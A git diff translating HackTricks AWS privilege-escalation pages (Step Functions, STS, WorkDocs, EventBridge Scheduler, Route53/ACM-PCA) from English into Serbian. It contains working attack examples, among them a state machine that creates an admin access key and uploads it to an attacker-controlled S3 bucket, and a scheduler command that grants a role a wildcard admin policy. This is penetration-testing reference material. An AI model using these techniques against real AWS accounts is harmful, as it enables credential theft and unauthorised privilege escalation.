-An attacker with the **`states:CreateStateMachine`**& **`iam:PassRole`** would be able to create an state machine and provide to it any IAM role, enabling unauthorized access to other AWS services with the roles' permissions. In contrast with the previous privesc technique (**`states:TestState`** & **`iam:PassRole`**), this one does not execute by itself, you will also need to have the **`states:StartExecution`** or **`states:StartSyncExecution`** permissions (**`states:StartSyncExecution`** is **not available for standard workflows**, **just to express state machines**) in order to start and execution over the state machine.
-
+Napadač sa **`states:CreateStateMachine`** & **`iam:PassRole`** bi mogao da kreira mašinu stanja i dodeli joj bilo koju IAM ulogu, omogućavajući neovlašćen pristup drugim AWS uslugama sa dozvolama te uloge. U poređenju sa prethodnom tehnikom privesc (**`states:TestState`** & **`iam:PassRole`**), ova ne izvršava sama, takođe će vam biti potrebne dozvole **`states:StartExecution`** ili **`states:StartSyncExecution`** (**`states:StartSyncExecution`** **nije dostupna za standardne radne tokove**, **samo za izražene mašine stanja**) kako biste započeli izvršenje nad mašinom stanja.
 ```bash
 # Create a state machine
 aws states create-state-machine --name  --definition  --role-arn  [--type ] [--logging-configuration ]\
@@ -82,176 +75,157 @@ aws states start-execution --state-machine-arn  [--name ] [--input
 # Start a Synchronous Express state machine execution
 aws states start-sync-execution --state-machine-arn  [--name ] [--input ] [--trace-header ]
 ```
-
 The following examples show how to create an state machine that creates an access key for the **`admin`** user and exfiltrates this access key to an attacker-controlled S3 bucket, leveraging these permissions and a permissive role of the AWS environment. This permissive role should have any high-privileged policy associated with it (for example **`arn:aws:iam::aws:policy/AdministratorAccess`**) that allows the state machine to perform the **`iam:CreateAccessKey`** & **`s3:putObject`** actions.
 
 - **stateMachineDefinition.json**:
-
 ```json
 {
-  "Comment": "Malicious state machine to create IAM access key and upload to S3",
-  "StartAt": "CreateAccessKey",
-  "States": {
-    "CreateAccessKey": {
-      "Type": "Task",
-      "Resource": "arn:aws:states:::aws-sdk:iam:createAccessKey",
-      "Parameters": {
-        "UserName": "admin"
-      },
-      "ResultPath": "$.AccessKeyResult",
-      "Next": "PrepareS3PutObject"
-    },
-    "PrepareS3PutObject": {
-      "Type": "Pass",
-      "Parameters": {
-        "Body.$": "$.AccessKeyResult.AccessKey",
-        "Bucket": "attacker-controlled-S3-bucket",
-        "Key": "AccessKey.json"
-      },
-      "ResultPath": "$.S3PutObjectParams",
-      "Next": "PutObject"
-    },
-    "PutObject": {
-      "Type": "Task",
-      "Resource": "arn:aws:states:::aws-sdk:s3:putObject",
-      "Parameters": {
-        "Body.$": "$.S3PutObjectParams.Body",
-        "Bucket.$": "$.S3PutObjectParams.Bucket",
-        "Key.$": "$.S3PutObjectParams.Key"
-      },
-      "End": true
-    }
-  }
+"Comment": "Malicious state machine to create IAM access key and upload to S3",
+"StartAt": "CreateAccessKey",
+"States": {
+"CreateAccessKey": {
+"Type": "Task",
+"Resource": "arn:aws:states:::aws-sdk:iam:createAccessKey",
+"Parameters": {
+"UserName": "admin"
+},
+"ResultPath": "$.AccessKeyResult",
+"Next": "PrepareS3PutObject"
+},
+"PrepareS3PutObject": {
+"Type": "Pass",
+"Parameters": {
+"Body.$": "$.AccessKeyResult.AccessKey",
+"Bucket": "attacker-controlled-S3-bucket",
+"Key": "AccessKey.json"
+},
+"ResultPath": "$.S3PutObjectParams",
+"Next": "PutObject"
+},
+"PutObject": {
+"Type": "Task",
+"Resource": "arn:aws:states:::aws-sdk:s3:putObject",
+"Parameters": {
+"Body.$": "$.S3PutObjectParams.Body",
+"Bucket.$": "$.S3PutObjectParams.Bucket",
+"Key.$": "$.S3PutObjectParams.Key"
+},
+"End": true
+}
+}
 }
 ```
-
-- **Command** executed to **create the state machine**:
-
+- **Komanda** izvršena za **kreiranje mašine stanja**:
 ```bash
 aws stepfunctions create-state-machine --name MaliciousStateMachine --definition file://stateMachineDefinition.json --role-arn arn:aws:iam::123456789012:role/PermissiveRole
 {
-  "stateMachineArn": "arn:aws:states:us-east-1:123456789012:stateMachine:MaliciousStateMachine",
-  "creationDate": "2024-07-09T20:29:35.381000+02:00"
+"stateMachineArn": "arn:aws:states:us-east-1:123456789012:stateMachine:MaliciousStateMachine",
+"creationDate": "2024-07-09T20:29:35.381000+02:00"
 }
 ```
-
-- **Command** executed to **start an execution** of the previously created state machine:
-
+- **Komanda** izvršena za **pokretanje izvršenja** prethodno kreirane mašine stanja:
 ```json
 aws stepfunctions start-execution --state-machine-arn arn:aws:states:us-east-1:123456789012:stateMachine:MaliciousStateMachine
 {
-    "executionArn": "arn:aws:states:us-east-1:123456789012:execution:MaliciousStateMachine:1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f",
-    "startDate": "2024-07-09T20:33:35.466000+02:00"
+"executionArn": "arn:aws:states:us-east-1:123456789012:execution:MaliciousStateMachine:1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f",
+"startDate": "2024-07-09T20:33:35.466000+02:00"
 }
 ```
-
 > [!WARNING]
-> The attacker-controlled S3 bucket should have permissions to accept an s3:PutObject action from the victim account.
+> Napadačem kontrolisani S3 bucket treba da ima dozvole da prihvati s3:PutObject akciju iz naloga žrtve.
 
-**Potential Impact**: Unauthorized execution and manipulation of workflows and access to sensitive resources, potentially leading to significant security breaches.
+**Potencijalni uticaj**: Neovlašćeno izvršavanje i manipulacija radnim tokovima i pristup osetljivim resursima, što može dovesti do značajnih bezbednosnih propusta.
 
-### `states:UpdateStateMachine` & (not always required) `iam:PassRole`
+### `states:UpdateStateMachine` & (ne uvek potrebno) `iam:PassRole`
 
-An attacker with the **`states:UpdateStateMachine`** permission would be able to modify the definition of an state machine, being able to add extra stealthy states that could end in a privilege escalation. This way, when a legitimate user starts an execution of the state machine, this new malicious stealth state will be executed and the privilege escalation will be successful.
+Napadač sa **`states:UpdateStateMachine`** dozvolom mogao bi da izmeni definiciju mašine stanja, dodajući dodatne stealth stanja koja bi mogla dovesti do eskalacije privilegija. Na ovaj način, kada legitimni korisnik pokrene izvršenje mašine stanja, ovo novo zloćudno stealth stanje će biti izvršeno i eskalacija privilegija će biti uspešna.
 
-Depending on how permissive is the IAM Role associated to the state machine is, an attacker would face 2 situations:
-
-1. **Permissive IAM Role**: If the IAM Role associated to the state machine is already permissive (it has for example the **`arn:aws:iam::aws:policy/AdministratorAccess`** policy attached), then the **`iam:PassRole`** permission would not be required in order to escalate privileges since it would not be necessary to also update the IAM Role, with the state machine definition is enough.
-2. **Not permissive IAM Role**: In contrast with the previous case, here an attacker would also require the **`iam:PassRole`** permission since it would be necessary to associate a permissive IAM Role to the state machine in addition to modify the state machine definition.
+U zavisnosti od toga koliko je permisivna IAM uloga povezana sa mašinom stanja, napadač bi se suočio sa 2 situacije:
 
+1. **Permisivna IAM uloga**: Ako je IAM uloga povezana sa mašinom stanja već permisivna (na primer, ima priloženu **`arn:aws:iam::aws:policy/AdministratorAccess`** politiku), tada **`iam:PassRole`** dozvola ne bi bila potrebna za eskalaciju privilegija, pošto ne bi bilo potrebno takođe ažurirati IAM ulogu, sa definicijom mašine stanja je dovoljno.
+2. **Nepremisivna IAM uloga**: U suprotnosti sa prethodnim slučajem, ovde bi napadač takođe zahtevao **`iam:PassRole`** dozvolu pošto bi bilo neophodno povezati permisivnu IAM ulogu sa mašinom stanja pored izmene definicije mašine stanja.
 ```bash
 aws states update-state-machine --state-machine-arn  [--definition ] [--role-arn ] [--logging-configuration ] \
 [--tracing-configuration ] [--publish | --no-publish] [--version-description ]
 ```
-
-The following examples show how to update a legit state machine that just invokes a HelloWorld Lambda function, in order to add an extra state that adds the user **`unprivilegedUser`** to the **`administrator`** IAM Group. This way, when a legitimate user starts an execution of the updated state machine, this new malicious stealth state will be executed and the privilege escalation will be successful.
+Следећи примери показују како да се ажурира легитимна машина стања која само позива HelloWorld Lambda функцију, како би се додала додатна стања која додаје корисника **`unprivilegedUser`** у **`administrator`** IAM групу. На овај начин, када легитимни корисник покрене извршење ажуриране машине стања, ово ново малигно стање ће бити извршено и ескалација привилегија ће бити успешна.
 
 > [!WARNING]
-> If the state machine does not have a permissive IAM Role associated, it would also be required the **`iam:PassRole`** permission to update the IAM Role in order to associate a permissive IAM Role (for example one with the **`arn:aws:iam::aws:policy/AdministratorAccess`** policy attached).
+> Ако машина стања нема повољну IAM улогу повезану, такође ће бити потребна дозвола **`iam:PassRole`** да би се ажурирала IAM улога у циљу повезивања повољне IAM улоге (на пример, једне са **`arn:aws:iam::aws:policy/AdministratorAccess`** политиком прикљученом).
 
 {{#tabs }}
 {{#tab name="Legit State Machine" }}
-
 ```json
 {
-  "Comment": "Hello world from Lambda state machine",
-  "StartAt": "Start PassState",
-  "States": {
-    "Start PassState": {
-      "Type": "Pass",
-      "Next": "LambdaInvoke"
-    },
-    "LambdaInvoke": {
-      "Type": "Task",
-      "Resource": "arn:aws:states:::lambda:invoke",
-      "Parameters": {
-        "FunctionName": "arn:aws:lambda:us-east-1:123456789012:function:HelloWorldLambda:$LATEST"
-      },
-      "Next": "End PassState"
-    },
-    "End PassState": {
-      "Type": "Pass",
-      "End": true
-    }
-  }
+"Comment": "Hello world from Lambda state machine",
+"StartAt": "Start PassState",
+"States": {
+"Start PassState": {
+"Type": "Pass",
+"Next": "LambdaInvoke"
+},
+"LambdaInvoke": {
+"Type": "Task",
+"Resource": "arn:aws:states:::lambda:invoke",
+"Parameters": {
+"FunctionName": "arn:aws:lambda:us-east-1:123456789012:function:HelloWorldLambda:$LATEST"
+},
+"Next": "End PassState"
+},
+"End PassState": {
+"Type": "Pass",
+"End": true
+}
+}
 }
 ```
-
 {{#endtab }}
 
-{{#tab name="Malicious Updated State Machine" }}
-
+{{#tab name="Zlonamerna ažurirana mašina stanja" }}
 ```json
 {
-  "Comment": "Hello world from Lambda state machine",
-  "StartAt": "Start PassState",
-  "States": {
-    "Start PassState": {
-      "Type": "Pass",
-      "Next": "LambdaInvoke"
-    },
-    "LambdaInvoke": {
-      "Type": "Task",
-      "Resource": "arn:aws:states:::lambda:invoke",
-      "Parameters": {
-        "FunctionName": "arn:aws:lambda:us-east-1:123456789012:function:HelloWorldLambda:$LATEST"
-      },
-      "Next": "AddUserToGroup"
-    },
-    "AddUserToGroup": {
-      "Type": "Task",
-      "Parameters": {
-        "GroupName": "administrator",
-        "UserName": "unprivilegedUser"
-      },
-      "Resource": "arn:aws:states:::aws-sdk:iam:addUserToGroup",
-      "Next": "End PassState"
-    },
-    "End PassState": {
-      "Type": "Pass",
-      "End": true
-    }
-  }
+"Comment": "Hello world from Lambda state machine",
+"StartAt": "Start PassState",
+"States": {
+"Start PassState": {
+"Type": "Pass",
+"Next": "LambdaInvoke"
+},
+"LambdaInvoke": {
+"Type": "Task",
+"Resource": "arn:aws:states:::lambda:invoke",
+"Parameters": {
+"FunctionName": "arn:aws:lambda:us-east-1:123456789012:function:HelloWorldLambda:$LATEST"
+},
+"Next": "AddUserToGroup"
+},
+"AddUserToGroup": {
+"Type": "Task",
+"Parameters": {
+"GroupName": "administrator",
+"UserName": "unprivilegedUser"
+},
+"Resource": "arn:aws:states:::aws-sdk:iam:addUserToGroup",
+"Next": "End PassState"
+},
+"End PassState": {
+"Type": "Pass",
+"End": true
+}
+}
 }
 ```
-
 {{#endtab }}
 {{#endtabs }}
 
-- **Command** executed to **update** **the legit state machine**:
-
+- **Komanda** izvršena za **ažuriranje** **legitimne mašine stanja**:
 ```bash
 aws stepfunctions update-state-machine --state-machine-arn arn:aws:states:us-east-1:123456789012:stateMachine:HelloWorldLambda --definition file://StateMachineUpdate.json
 {
-    "updateDate": "2024-07-10T20:07:10.294000+02:00",
-    "revisionId": "1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f"
+"updateDate": "2024-07-10T20:07:10.294000+02:00",
+"revisionId": "1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f"
 }
 ```
-
-**Potential Impact**: Unauthorized execution and manipulation of workflows and access to sensitive resources, potentially leading to significant security breaches.
+**Potencijalni uticaj**: Neovlašćena izvršenja i manipulacija radnim tokovima i pristup osetljivim resursima, što može dovesti do značajnih bezbednosnih propusta.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md
index 782bcc237..27e73f6e5 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md
@@ -6,121 +6,101 @@
 
 ### `sts:AssumeRole`
 
-Every role is created with a **role trust policy**, this policy indicates **who can assume the created role**. If a role from the **same account** says that an account can assume it, it means that the account will be able to access the role (and potentially **privesc**).
-
-For example, the following role trust policy indicates that anyone can assume it, therefore **any user will be able to privesc** to the permissions associated with that role.
+Svaka uloga se kreira sa **politikom poverenja uloge**, ova politika označava **ko može da preuzme kreiranu ulogu**. Ako uloga iz **iste naloge** kaže da neka naloga može da je preuzme, to znači da će naloga moći da pristupi ulozi (i potencijalno **privesc**).
 
+Na primer, sledeća politika poverenja uloge označava da bilo ko može da je preuzme, stoga **bilo koji korisnik će moći da privesc** na dozvole povezane sa tom ulogom.
 ```json
 {
-  "Version": "2012-10-17",
-  "Statement": [
-    {
-      "Effect": "Allow",
-      "Principal": {
-        "AWS": "*"
-      },
-      "Action": "sts:AssumeRole"
-    }
-  ]
+"Version": "2012-10-17",
+"Statement": [
+{
+"Effect": "Allow",
+"Principal": {
+"AWS": "*"
+},
+"Action": "sts:AssumeRole"
+}
+]
 }
 ```
-
-You can impersonate a role running:
-
+Možete se pretvarati da ste uloga koja se izvršava:
 ```bash
 aws sts assume-role --role-arn $ROLE_ARN --role-session-name sessionname
 ```
-
-**Potential Impact:** Privesc to the role.
+**Potencijalni Uticaj:** Privesc na ulogu.
 
 > [!CAUTION]
-> Note that in this case the permission `sts:AssumeRole` needs to be **indicated in the role to abuse** and not in a policy belonging to the attacker.\
-> With one exception, in order to **assume a role from a different account** the attacker account **also needs** to have the **`sts:AssumeRole`** over the role.
+> Imajte na umu da u ovom slučaju dozvola `sts:AssumeRole` treba da bude **naznačena u ulozi koju treba zloupotrebiti** i ne u politici koja pripada napadaču.\
+> Sa jednim izuzetkom, da bi se **preuzela uloga iz druge računa** napadačev račun **takođe treba** da ima **`sts:AssumeRole`** nad ulogom.
 
 ### **`sts:GetFederationToken`**
 
-With this permission it's possible to generate credentials to impersonate any user:
-
+Sa ovom dozvolom moguće je generisati akreditive za impersonaciju bilo kog korisnika:
 ```bash
 aws sts get-federation-token --name 
 ```
-
-This is how this permission can be given securely without giving access to impersonate other users:
-
+Ovo je kako se ova dozvola može dati sigurno bez davanja pristupa za oponašanje drugih korisnika:
 ```json
 {
-  "Version": "2012-10-17",
-  "Statement": [
-    {
-      "Sid": "VisualEditor0",
-      "Effect": "Allow",
-      "Action": "sts:GetFederationToken",
-      "Resource": "arn:aws:sts::947247140022:federated-user/${aws:username}"
-    }
-  ]
+"Version": "2012-10-17",
+"Statement": [
+{
+"Sid": "VisualEditor0",
+"Effect": "Allow",
+"Action": "sts:GetFederationToken",
+"Resource": "arn:aws:sts::947247140022:federated-user/${aws:username}"
+}
+]
 }
 ```
-
 ### `sts:AssumeRoleWithSAML`
 
-A trust policy with this role grants **users authenticated via SAML access to impersonate the role.**
-
-An example of a trust policy with this permission is:
+Politika poverenja sa ovom ulogom omogućava **korisnicima koji su autentifikovani putem SAML da se pretvaraju da su ta uloga.**
 
+Primer politike poverenja sa ovom dozvolom je:
 ```json
 {
-  "Version": "2012-10-17",
-  "Statement": [
-    {
-      "Sid": "OneLogin",
-      "Effect": "Allow",
-      "Principal": {
-        "Federated": "arn:aws:iam::290594632123:saml-provider/OneLogin"
-      },
-      "Action": "sts:AssumeRoleWithSAML",
-      "Condition": {
-        "StringEquals": {
-          "SAML:aud": "https://signin.aws.amazon.com/saml"
-        }
-      }
-    }
-  ]
+"Version": "2012-10-17",
+"Statement": [
+{
+"Sid": "OneLogin",
+"Effect": "Allow",
+"Principal": {
+"Federated": "arn:aws:iam::290594632123:saml-provider/OneLogin"
+},
+"Action": "sts:AssumeRoleWithSAML",
+"Condition": {
+"StringEquals": {
+"SAML:aud": "https://signin.aws.amazon.com/saml"
+}
+}
+}
+]
 }
 ```
-
-To generate credentials to impersonate the role in general you could use something like:
-
+Da biste generisali akreditive za impersonaciju uloge, generalno možete koristiti nešto poput:
 ```bash
 aws sts  assume-role-with-saml --role-arn  --principal-arn 
 ```
-
-But **providers** might have their **own tools** to make this easier, like [onelogin-aws-assume-role](https://github.com/onelogin/onelogin-python-aws-assume-role):
-
+Ali **provajderi** mogu imati **svoje alate** koji olakšavaju ovo, kao što je [onelogin-aws-assume-role](https://github.com/onelogin/onelogin-python-aws-assume-role):
 ```bash
 onelogin-aws-assume-role --onelogin-subdomain mettle --onelogin-app-id 283740 --aws-region eu-west-1 -z 3600
 ```
-
-**Potential Impact:** Privesc to the role.
+**Potencijalni uticaj:** Privesc na ulogu.
 
 ### `sts:AssumeRoleWithWebIdentity`
 
-This permission grants permission to obtain a set of temporary security credentials for **users who have been authenticated in a mobile, web application, EKS...** with a web identity provider. [Learn more here.](https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithWebIdentity.html)
-
-For example, if an **EKS service account** should be able to **impersonate an IAM role**, it will have a token in **`/var/run/secrets/eks.amazonaws.com/serviceaccount/token`** and can **assume the role and get credentials** doing something like:
+Ova dozvola omogućava dobijanje skupa privremenih bezbednosnih akreditiva za **korisnike koji su autentifikovani u mobilnoj, web aplikaciji, EKS...** sa provajderom web identiteta. [Saznajte više ovde.](https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithWebIdentity.html)
 
+Na primer, ako **EKS servisni nalog** treba da može da **pretvara se u IAM ulogu**, imaće token u **`/var/run/secrets/eks.amazonaws.com/serviceaccount/token`** i može **pretpostaviti ulogu i dobiti akreditive** radeći nešto poput:
 ```bash
 aws sts assume-role-with-web-identity --role-arn arn:aws:iam::123456789098:role/ --role-session-name something --web-identity-token file:///var/run/secrets/eks.amazonaws.com/serviceaccount/token
 # The role name can be found in the metadata of the configuration of the pod
 ```
-
-### Federation Abuse
+### Zloupotreba federacije
 
 {{#ref}}
 ../aws-basic-information/aws-federation-abuse.md
 {{#endref}}
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md
index 4b1e5e7e9..478501d6e 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md
@@ -2,7 +2,7 @@
 
 ## WorkDocs
 
-For more info about WorkDocs check:
+Za više informacija o WorkDocs, proverite:
 
 {{#ref}}
 ../aws-services/aws-directory-services-workdocs-enum.md
@@ -10,17 +10,14 @@ For more info about WorkDocs check:
 
 ### `workdocs:CreateUser`
 
-Create a user inside the Directory indicated, then you will have access to both WorkDocs and AD:
-
+Kreirajte korisnika unutar naznačenog direktorijuma, tada ćete imati pristup i WorkDocs i AD:
 ```bash
 # Create user (created inside the AD)
 aws workdocs create-user --username testingasd --given-name testingasd --surname testingasd --password  --email-address name@directory.domain --organization-id 
 ```
-
 ### `workdocs:GetDocument`, `(workdocs:`DescribeActivities`)`
 
-The files might contain sensitive information, read them:
-
+Fajlovi mogu sadržati osetljive informacije, pročitajte ih:
 ```bash
 # Get what was created in the directory
 aws workdocs describe-activities --organization-id 
@@ -31,26 +28,19 @@ aws workdocs describe-activities --user-id "S-1-5-21-377..."
 # Get file (a url to access with the content will be retreived)
 aws workdocs get-document --document-id 
 ```
-
 ### `workdocs:AddResourcePermissions`
 
-If you don't have access to read something, you can just grant it
-
+Ako nemate pristup da nešto pročitate, možete jednostavno dodeliti pristup.
 ```bash
 # Add permission so anyway can see the file
 aws workdocs add-resource-permissions --resource-id  --principals Id=anonymous,Type=ANONYMOUS,Role=VIEWER
 ## This will give an id, the file will be acesible in: https://.awsapps.com/workdocs/index.html#/share/document/
 ```
-
 ### `workdocs:AddUserToGroup`
 
-You can make a user admin by setting it in the group ZOCALO_ADMIN.\
-For that follow the instructions from [https://docs.aws.amazon.com/workdocs/latest/adminguide/manage_set_admin.html](https://docs.aws.amazon.com/workdocs/latest/adminguide/manage_set_admin.html)
-
-Login with that user in workdoc and access the admin panel in `/workdocs/index.html#/admin`
-
-I didn't find any way to do this from the cli.
-
-
+Možete postaviti korisnika za administratora tako što ćete ga dodati u grupu ZOCALO_ADMIN.\
+Za to pratite uputstva sa [https://docs.aws.amazon.com/workdocs/latest/adminguide/manage_set_admin.html](https://docs.aws.amazon.com/workdocs/latest/adminguide/manage_set_admin.html)
 
+Prijavite se sa tim korisnikom u workdocs i pristupite administratorskom panelu na `/workdocs/index.html#/admin`
 
+Nisam našao nijedan način da to uradim iz cli.
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md
index 1519df70f..73dd7534a 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md
@@ -4,7 +4,7 @@
 
 ## EventBridge Scheduler
 
-More info EventBridge Scheduler in:
+Više informacija o EventBridge Scheduler-u u:
 
 {{#ref}}
 ../aws-services/eventbridgescheduler-enum.md
@@ -12,42 +12,34 @@ More info EventBridge Scheduler in:
 
 ### `iam:PassRole`, (`scheduler:CreateSchedule` | `scheduler:UpdateSchedule`)
 
-An attacker with those permissions will be able to **`create`|`update` an scheduler and abuse the permissions of the scheduler role** attached to it to perform any action
-
-For example, they could configure the schedule to **invoke a Lambda function** which is a templated action:
+Napadač sa tim dozvolama će moći da **`kreira`|`ažurira` raspored i zloupotrebi dozvole uloge rasporeda** koja je povezana sa njim da izvrši bilo koju akciju
 
+Na primer, mogli bi da konfigurišu raspored da **pozove Lambda funkciju** koja je akcija sa šablonom:
 ```bash
 aws scheduler create-schedule \
-    --name MyLambdaSchedule \
-    --schedule-expression "rate(5 minutes)" \
-    --flexible-time-window "Mode=OFF" \
-    --target '{
-        "Arn": "arn:aws:lambda:::function:",
-        "RoleArn": "arn:aws:iam:::role/"
-    }'
+--name MyLambdaSchedule \
+--schedule-expression "rate(5 minutes)" \
+--flexible-time-window "Mode=OFF" \
+--target '{
+"Arn": "arn:aws:lambda:::function:",
+"RoleArn": "arn:aws:iam:::role/"
+}'
 ```
-
-In addition to templated service actions, you can use **universal targets** in EventBridge Scheduler to invoke a wide range of API operations for many AWS services. Universal targets offer flexibility to invoke almost any API. One example can be using universal targets adding "**AdminAccessPolicy**", using a role that has "**putRolePolicy**" policy:
-
+Pored šablonskih akcija servisa, možete koristiti **univerzalne ciljeve** u EventBridge Scheduler-u za pozivanje širokog spektra API operacija za mnoge AWS servise. Univerzalni ciljevi nude fleksibilnost za pozivanje gotovo bilo kog API-ja. Jedan primer može biti korišćenje univerzalnih ciljeva za dodavanje "**AdminAccessPolicy**", koristeći ulogu koja ima politiku "**putRolePolicy**":
 ```bash
 aws scheduler create-schedule \
-    --name GrantAdminToTargetRoleSchedule \
-    --schedule-expression "rate(5 minutes)" \
-    --flexible-time-window "Mode=OFF" \
-    --target '{
-        "Arn": "arn:aws:scheduler:::aws-sdk:iam:putRolePolicy",
-        "RoleArn": "arn:aws:iam:::role/RoleWithPutPolicy",
-        "Input": "{\"RoleName\": \"TargetRole\", \"PolicyName\": \"AdminAccessPolicy\", \"PolicyDocument\": \"{\\\"Version\\\": \\\"2012-10-17\\\", \\\"Statement\\\": [{\\\"Effect\\\": \\\"Allow\\\", \\\"Action\\\": \\\"*\\\", \\\"Resource\\\": \\\"*\\\"}]}\"}"
-    }'
+--name GrantAdminToTargetRoleSchedule \
+--schedule-expression "rate(5 minutes)" \
+--flexible-time-window "Mode=OFF" \
+--target '{
+"Arn": "arn:aws:scheduler:::aws-sdk:iam:putRolePolicy",
+"RoleArn": "arn:aws:iam:::role/RoleWithPutPolicy",
+"Input": "{\"RoleName\": \"TargetRole\", \"PolicyName\": \"AdminAccessPolicy\", \"PolicyDocument\": \"{\\\"Version\\\": \\\"2012-10-17\\\", \\\"Statement\\\": [{\\\"Effect\\\": \\\"Allow\\\", \\\"Action\\\": \\\"*\\\", \\\"Resource\\\": \\\"*\\\"}]}\"}"
+}'
 ```
-
 ## References
 
 - [https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html)
 - [https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md
index fc3563ce7..c3212ee21 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md
@@ -2,7 +2,7 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-For more information about Route53 check:
+Za više informacija o Route53 pogledajte:
 
 {{#ref}}
 ../aws-services/aws-route53-enum.md
@@ -11,26 +11,22 @@ For more information about Route53 check:
 ### `route53:CreateHostedZone`, `route53:ChangeResourceRecordSets`, `acm-pca:IssueCertificate`, `acm-pca:GetCertificate`
 
 > [!NOTE]
-> To perform this attack the target account must already have an [**AWS Certificate Manager Private Certificate Authority**](https://aws.amazon.com/certificate-manager/private-certificate-authority/) **(AWS-PCA)** setup in the account, and EC2 instances in the VPC(s) must have already imported the certificates to trust it. With this infrastructure in place, the following attack can be performed to intercept AWS API traffic.
+> Da bi se izvršio ovaj napad, ciljni nalog mora već imati [**AWS Certificate Manager Private Certificate Authority**](https://aws.amazon.com/certificate-manager/private-certificate-authority/) **(AWS-PCA)** postavljen u nalogu, a EC2 instance u VPC-ima moraju već imati uvezene sertifikate da bi im verovale. Sa ovom infrastrukturom, sledeći napad može biti izveden da bi se presreo AWS API saobraćaj.
 
-Other permissions **recommend but not required for the enumeration** part: `route53:GetHostedZone`, `route53:ListHostedZones`, `acm-pca:ListCertificateAuthorities`, `ec2:DescribeVpcs`
+Ostale dozvole **preporučene, ali neobavezne za deo enumeracije**: `route53:GetHostedZone`, `route53:ListHostedZones`, `acm-pca:ListCertificateAuthorities`, `ec2:DescribeVpcs`
 
-Assuming there is an AWS VPC with multiple cloud-native applications talking to each other and to AWS API. Since the communication between the microservices is often TLS encrypted there must be a private CA to issue the valid certificates for those services. **If ACM-PCA is used** for that and the adversary manages to get **access to control both route53 and acm-pca private CA** with the minimum set of permissions described above, it can **hijack the application calls to AWS API** taking over their IAM permissions.
+Pretpostavljajući da postoji AWS VPC sa više cloud-native aplikacija koje komuniciraju međusobno i sa AWS API. Pošto je komunikacija između mikroservisa često TLS enkriptovana, mora postojati privatna CA koja izdaje važeće sertifikate za te usluge. **Ako se koristi ACM-PCA** za to i protivnik uspe da dobije **pristup kontroli i route53 i acm-pca privatne CA** sa minimalnim skupom dozvola opisanih iznad, može **preuzeti pozive aplikacija ka AWS API** preuzimajući njihove IAM dozvole.
 
-This is possible because:
+To je moguće jer:
 
-- AWS SDKs do not have [Certificate Pinning](https://www.digicert.com/blog/certificate-pinning-what-is-certificate-pinning)
-- Route53 allows creating Private Hosted Zone and DNS records for AWS APIs domain names
-- Private CA in ACM-PCA cannot be restricted to signing only certificates for specific Common Names
+- AWS SDK-ovi nemaju [Certificate Pinning](https://www.digicert.com/blog/certificate-pinning-what-is-certificate-pinning)
+- Route53 omogućava kreiranje Privatne Hosted Zone i DNS zapisa za imena domena AWS API
+- Privatna CA u ACM-PCA ne može biti ograničena na potpisivanje samo sertifikata za specifične Common Names
 
-**Potential Impact:** Indirect privesc by intercepting sensitive information in the traffic.
+**Potencijalni uticaj:** Indirektni privesc presretanjem osetljivih informacija u saobraćaju.
 
-#### Exploitation 
+#### Eksploatacija 
 
-Find the exploitation steps in the original research: [**https://niebardzo.github.io/2022-03-11-aws-hijacking-route53/**](https://niebardzo.github.io/2022-03-11-aws-hijacking-route53/)
+Pronađite korake eksploatacije u originalnom istraživanju: [**https://niebardzo.github.io/2022-03-11-aws-hijacking-route53/**](https://niebardzo.github.io/2022-03-11-aws-hijacking-route53/)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/README.md b/src/pentesting-cloud/aws-security/aws-services/README.md
index dddd8ac04..5b5bcb629 100644
--- a/src/pentesting-cloud/aws-security/aws-services/README.md
+++ b/src/pentesting-cloud/aws-security/aws-services/README.md
@@ -1,35 +1,31 @@
-# AWS - Services
+# AWS - Usluge
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Types of services
+## Tipovi usluga
 
-### Container services
+### Usluge kontejnera
 
-Services that fall under container services have the following characteristics:
+Usluge koje spadaju pod usluge kontejnera imaju sledeće karakteristike:
 
